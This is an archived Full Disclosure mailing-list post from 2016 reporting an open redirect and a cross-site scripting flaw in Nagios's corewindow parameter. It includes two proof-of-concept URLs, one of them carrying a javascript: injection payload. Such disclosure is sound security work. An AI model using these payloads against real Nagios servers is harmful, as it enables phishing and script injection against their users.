[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] nagios phishing vector & xss

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] nagios phishing vector & xss
From: randomsec guy <randomsecguy@xxxxxxxxxxx>
Date: Thu, 9 Jun 2016 17:34:40 +0000

corewindow can be used to phish users:
http://jdoe:jdoe@xxxxxxxxxxxxxxxxxxxxxxxxxxx/nagios/index.php?corewindow=http://wikipedia.com

also to perform xss:
http://jdoe:jdoe@xxxxxxxxxxxxxxxxxxxxxxxxxxx/nagios/index.php?corewindow=javascript://zz%250a;onload=alert(document.domain)//

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] FlashFXP v5.3.0 (Windows) - Memory Corruption Vulnerability
Next by Date: [FD] Samsung SW Update - Insecure ACLs on SW Update Service Directory - EoP Vulnerability
Previous by thread: [FD] FlashFXP v5.3.0 (Windows) - Memory Corruption Vulnerability
Next by thread: [FD] Samsung SW Update - Insecure ACLs on SW Update Service Directory - EoP Vulnerability
Index(es):
- Date
- Thread